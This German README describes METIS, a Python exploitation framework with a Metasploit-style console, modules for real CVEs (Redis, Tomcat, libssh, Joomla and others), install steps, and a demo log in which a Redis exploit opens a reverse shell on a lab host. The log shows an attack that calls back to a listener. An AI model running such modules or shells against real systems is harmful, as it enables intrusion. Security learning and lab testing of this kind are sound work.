Modulares Python-Exploitation-Framework mit einer Metasploit-ähnlichen Konsole, automatisch registrierenden Exploit- und Auxiliary-Modulen, Tri-State-Prüfungen und mehreren Session-Transporten für Labor- und CTF-Ziele.
███╗ ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗ ██║ ██║███████╗
██║╚██╔╝██║██╔══╝ ██║ ██║╚════██║
██║ ╚═╝ ██║███████╗ ██║ ██║███████║
╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝╚══════╝
Ein Python-Exploitation-Framework, das zum Lernen entwickelt wurde. Modulare Architektur, thematische Konsole, mehrere Session-Transporte und eine wachsende Bibliothek von CVE-Modulen.
METIS ist ein community-getriebenes Sicherheitsforschungs-Framework. Das Ziel ist es, eine wachsende Sammlung von Modulen aufzubauen, die von Sicherheitsforschern, Entwicklern und der breiteren Community beigesteuert werden.
Hast du einen nützlichen Scanner, ein Auxiliary-Modul, ein Exploit-Modul oder andere Sicherheitsforschungs-Tools, die du teilen möchtest? Füge es zu METIS hinzu und öffne einen Pull Request.
Alle Beiträge sind willkommen, sofern sie der Modulstruktur, den Coding-Standards und den Richtlinien zur autorisierten Nutzung des Projekts folgen.
Egal, ob du ein neues CVE-Modul hinzufügst, ein bestehendes Modul verbesserst, einen Bug behebst oder neue Framework-Funktionalität baust – deine Beiträge können helfen, METIS für alle besser zu machen.
Siehe Module schreiben unten für Informationen zum Erstellen deines eigenen Moduls.
METIS ist ein modulares C2-/Exploitation-Framework, geschrieben in Python. Es führt eine interaktive Konsole im Metasploit-Stil aus, in der du Module auswählst, Optionen setzt, Checks ausführst und Sessions gegen Lab-Ziele landest.
Es ist konzipiert für:
Es ist nicht konzipiert für:
.py-Datei in modules/ ab und sie registriert sich automatischExploit (erzeugt Sessions) und Auxiliary (Scanner, Enumeratoren)check() — jedes Modul kann vor dem Angriff verifizieren (VULNERABLE / SAFE / UNKNOWN)file:-Zielspezifikationen mit Live-FortschrittsbalkenKEY=VALUE-Dateien| Modul | Beschreibung |
|---|---|
auxiliary/scanner/tcp_connect | Threaded TCP-Port-Scanner |
auxiliary/scanner/hikvision_cve_2017_7921 | Hikvision IP-Kamera Auth-Bypass + Benutzer-Enumeration |
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 | MikroTik WinBox Credential-Leak |
auxiliary/scanner/redis_cve_2022_0543 | Redis Lua Sandbox Escape Detektor |
| Modul | Session-Typ |
|---|---|
exploit/unix/ftp/vsftpd_234_backdoor | Bind-Socket |
exploit/multi/http/ghost_cms_handlebars_rce | Reverse-Socket |
exploit/multi/http/langflow_rce_cve_2026_9198 | Reverse-Socket |
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816 | Reverse-Socket |
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197 | Reverse-Socket |
exploit/multi/http/tomcat_put_rce_cve_2017_12615 | Reverse-Socket |
exploit/multi/http/joomla_jce_rce_cve_2026_48907 | HTTP-Webshell |
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819 | Verzögertes Reverse (cron) |
exploit/linux/redis/redis_cve_2022_0543_rce | Reverse-Socket |
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933 | Paramiko-Kanal |
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061 | Rohes Telnet-Socket |
Erfordert Python 3.10+ und git.
git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
requirements.txt:
pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43
Ausführen:
python3 metis.py
metis > show modules
# Module Date Rank Chk Description
-- ------------------------------------------------------------ ---------- --------- --- -----------
1 auxiliary/scanner/hikvision_cve_2017_7921 2017-09-23 normal Yes Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
2 auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 2018-08-01 great Yes MikroTik WinBox Credential Leak (CVE-2018-14847)
...
15 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes vsftpd 2.3.4 Backdoor Command Execution
metis > search redis
# Module Date Rank Chk Description
-- ------ ---- ---- --- -----------
1 auxiliary/scanner/redis_cve_2022_0543 2022-02-18 excellent Yes Redis CVE-2022-0543 Scanner
2 exploit/linux/redis/redis_cve_2022_0543_rce 2022-02-18 excellent Yes Redis CVE-2022-0543 Lua Sandbox Escape RCE
metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>
metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
a3f2b1c4 192.168.56.101:51234 (alive)
metis exploit(linux/redis/redis_cve_2022_0543_rce) > interact a3f2b1c4
[*] interacting with a3f2b1c4. 'background' returns, '!cmd' runs locally.
a3f2b1c4 $ id
uid=105(redis) gid=108(redis) groups=108(redis)
a3f2b1c4 $ background
metis >